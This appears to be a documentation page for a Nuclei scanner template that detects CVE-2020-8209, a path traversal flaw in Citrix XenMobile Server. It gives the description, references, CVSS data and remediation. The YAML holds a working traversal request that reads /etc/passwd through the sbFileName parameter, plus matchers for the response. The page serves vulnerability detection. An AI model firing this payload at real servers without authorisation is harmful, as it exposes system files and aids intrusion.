Citrix XenMobile Server - Local File Inclusion
ID: CVE-2020-8209
Severity: high
Author: dwisiswant0
Tags: cve2020,cve,citrix,lfi,xenmobile
Description
Section titled “Description”Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.reference:- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/- https://support.citrix.com/article/CTX277457- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
YAML Source
Section titled “YAML Source”id: CVE-2020-8209
info: name: Citrix XenMobile Server - Local File Inclusion author: dwisiswant0 severity: high description: | Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities. reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 impact: | An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access. remediation: | Apply the latest security patches or updates provided by Citrix to fix the vulnerability. reference: - https://support.citrix.com/article/CTX277457 - https://github.com/Miraitowa70/POC-Notes - https://github.com/dudek-marcin/Poc-Exp - https://github.com/hectorgie/PoC-in-GitHub - https://github.com/pen4uin/vulnerability-research classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-8209 cwe-id: CWE-22 epss-score: 0.96834 epss-percentile: 0.9967 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix product: xenmobile_server tags: cve2020,cve,citrix,lfi,xenmobile
http: - method: GET path: - "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
matchers-condition: and matchers: - type: word part: header words: - "fileDownload=true" - "application/octet-stream" - "attachment;" condition: and
- type: regex part: body regex: - "root:.*:0:0:"# digest: 4a0a00473045022035e0b478616581914b2a6993aa7e9ad8254042f24be43a4d8cf599e48d9e46fa022100a3b742726e933d3f853e5bb269bcd047ffe47b51242f446df8d7d9c54c01f59a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8209.yaml"